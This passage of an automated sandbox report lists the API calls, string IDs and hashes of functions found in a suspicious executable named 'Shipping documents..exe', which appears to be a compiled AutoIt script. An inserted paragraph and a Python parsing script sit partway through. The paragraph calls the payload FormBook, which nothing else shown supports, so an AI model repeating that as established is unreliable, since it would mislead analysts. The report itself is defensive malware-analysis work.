                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 978794511-0
                                                                                                          • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                          • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                                          • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                          • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                          • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                          • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                          • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClearVariant
                                                                                                          • String ID:
                                                                                                          • API String ID: 1473721057-0
                                                                                                          • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                          • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                          • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                          • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_memcmp
                                                                                                          • String ID: '$\$h
                                                                                                          • API String ID: 2205784470-1303700344
                                                                                                          • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                          • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                                          • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                          • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
APIs
• VariantInit.OLEAUT32(00000000), ref: 0045EA56
• VariantCopy.OLEAUT32(00000000), ref: 0045EA60
• VariantClear.OLEAUT32 ref: 0045EA6D
• VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
• __swprintf.LIBCMT ref: 0045EC33
• VariantInit.OLEAUT32(00000000), ref: 0045ECEE
Strings
• %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Variant$InitTime$ClearCopySystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d
• API String ID: 2441338619-1568723262
• Opcode ID: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
• Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
• Opcode Fuzzy Hash: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
• Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
APIs
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
• Sleep.KERNEL32(0000000A), ref: 0042C67F
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID: @COM_EVENTOBJ
• API String ID: 327565842-2228938565
• Opcode ID: c53429027a938d0cb53d738561a5b537c268b9dae225d633b1d56c3c7d20582e
• Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
• Opcode Fuzzy Hash: c53429027a938d0cb53d738561a5b537c268b9dae225d633b1d56c3c7d20582e
• Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
APIs
• VariantClear.OLEAUT32(?), ref: 0047031B
• VariantClear.OLEAUT32(?), ref: 0047044F
• VariantInit.OLEAUT32(?), ref: 004704A3
• DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
• VariantClear.OLEAUT32(?), ref: 00470516
  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
• VariantCopy.OLEAUT32(?,?), ref: 0047057A
  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
• VariantClear.OLEAUT32(00000000), ref: 0047060D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Variant$Clear$Copy$CallDispFuncInit
• String ID: H
• API String ID: 3613100350-2852464175
• Opcode ID: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
• Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
• Opcode Fuzzy Hash: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
• Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
• HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
• String ID:
• API String ID: 1291720006-3916222277
• Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
• Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
• Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
• Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
APIs
• GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
• IsMenu.USER32(?), ref: 0045FC5F
• CreatePopupMenu.USER32 ref: 0045FC97
• GetMenuItemCount.USER32(?), ref: 0045FCFD
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
• API String ID: 93392585-3793063076
• Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
• Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
• Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
• Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
APIs
• SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
• VariantClear.OLEAUT32(?), ref: 00435320
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
• VariantClear.OLEAUT32(?), ref: 004353B3
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
• String ID: crts
• API String ID: 586820018-3724388283
• Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
• Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Shipping documents..exe,0040F545,C:\Users\user\Desktop\Shipping documents..exe,004A90E8,C:\Users\user\Desktop\Shipping documents..exe,?,0040F545), ref: 0041013C
• lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
• MoveFileW.KERNEL32(?,?), ref: 0044BC3F
• _wcscat.LIBCMT ref: 0044BCAF
• _wcslen.LIBCMT ref: 0044BCBB
• _wcslen.LIBCMT ref: 0044BCD1
• SHFileOperationW.SHELL32(?), ref: 0044BD17
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
• String ID: \*.*
• API String ID: 2326526234-1173974218
• Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
• Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
• Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
• Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                          APIs
                                                                                                            • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                          • _wcslen.LIBCMT ref: 004335F2
                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                          • GetLastError.KERNEL32 ref: 0043362B
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                          • _wcsrchr.LIBCMT ref: 00433666
                                                                                                            • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                          • String ID: \
                                                                                                          • API String ID: 321622961-2967466578
                                                                                                          • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                                                          • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                          • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                                                          • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsnicmp
                                                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                          • API String ID: 1038674560-2734436370
                                                                                                          • Opcode ID: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                                                                          • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                                          • Opcode Fuzzy Hash: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                                                                          • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
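The entry above is the directive parser of the AutoIt3 runtime: __wcsnicmp compares script text case-insensitively against #OnAutoItStartRegister, #notrayicon and #requireadmin, all of which are AutoIt script directives, so the submitted executable embeds the AutoIt3 interpreter (a compiled AutoIt script carrying the FormBook payload). The Python below is an added triage example, not code from the Joe Sandbox report or the Joe Sandbox IDA plugin: it parses these per-function blocks into records (API references, String IDs, API String IDs) and answers questions such as "which function references AutoIt directives?" or "which functions call CreateDirectoryW?" without scrolling through thousands of lines. SAMPLE_REPORT is constructed from three entries on this page, AUTOIT_DIRECTIVES holds only the three directives shown here, and the names parse_report, find_autoit_directive_entries and calls_api belong to this example alone.

```python
"""Added triage example (not code from the Joe Sandbox report): parse the
per-function blocks as the report renders them and flag AutoIt directives."""
import re
from dataclasses import dataclass, field

# One API reference line, e.g. "• SHFileOperationW.SHELL32(?), ref: 0044BD17",
# "• _wcslen.LIBCMT ref: 0044BCD1" or a "• Part of subcall function X: ..." line.
API_LINE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s+)?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
# AutoIt script directives taken from this report's String ID field. The
# function that references them calls __wcsnicmp, so match case-insensitively.
AUTOIT_DIRECTIVES = {"#onautoitstartregister", "#notrayicon", "#requireadmin"}

# Constructed sample: three entries copied from the report with the repeated
# 'Memory Dump Source' lines left out (the parser ignores them anyway).
SAMPLE_REPORT = r"""
APIs
• _wcslen.LIBCMT ref: 0044BCD1
• SHFileOperationW.SHELL32(?), ref: 0044BD17
Similarity
• API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
• String ID: \*.*
• API String ID: 2326526234-1173974218
APIs
  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
• GetFileAttributesW.KERNEL32(?), ref: 0043361C
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
• String ID: \
• API String ID: 321622961-2967466578
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
"""


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)      # (name, module, ref) called directly
    subcalls: list = field(default_factory=list)  # (callee, name, module, ref)
    api_id: str = ""
    string_ids: list = field(default_factory=list)
    api_string_id: str = ""


def parse_report(text: str) -> list:
    """Return one FunctionEntry per 'APIs' block, in report order."""
    entries, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = FunctionEntry()
                entries.append(current)
            section = line
        elif current is None or not line.startswith("•"):
            continue
        elif section == "APIs":
            m = API_LINE.match(line)
            if m and m.group("sub"):
                current.subcalls.append((m.group("sub"), m.group("name"),
                                         m.group("module"), m.group("ref")))
            elif m:
                current.apis.append((m.group("name"), m.group("module"), m.group("ref")))
        elif section == "Similarity":
            key, _, value = line.lstrip("• ").partition(":")
            key, value = key.strip(), value.strip()
            if key == "API ID":
                current.api_id = value
            elif key == "String ID":      # several strings are joined with '$'
                current.string_ids = [s for s in value.split("$") if s]
            elif key == "API String ID":
                current.api_string_id = value
    return entries


def find_autoit_directive_entries(entries: list) -> list:
    """Entries whose String ID field holds a known AutoIt directive."""
    return [e for e in entries
            if any(s.lower() in AUTOIT_DIRECTIVES for s in e.string_ids)]


def calls_api(entry: FunctionEntry, name: str) -> bool:
    """True if the entry calls `name` directly or through a listed subcall."""
    return any(a[0] == name for a in entry.apis) or any(s[1] == name for s in entry.subcalls)


if __name__ == "__main__":
    parsed = parse_report(SAMPLE_REPORT)
    for e in find_autoit_directive_entries(parsed):
        print("AutoIt directive parser:", e.api_id, e.string_ids)
    print("creates directories:", [e.api_id for e in parsed if calls_api(e, "CreateDirectoryW")])
```

The parser keys only on the section headers and the bullet lines, so a saved copy of the full report, repeated Memory Dump Source blocks included, can be fed to parse_report unchanged; the Opcode and Instruction hashes are left out of the record because their algorithms are not documented on the page.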
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                          • __lock.LIBCMT ref: 00417981
                                                                                                            • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                            • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                            • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                          • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                          • __lock.LIBCMT ref: 004179A2
                                                                                                          • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                          Strings
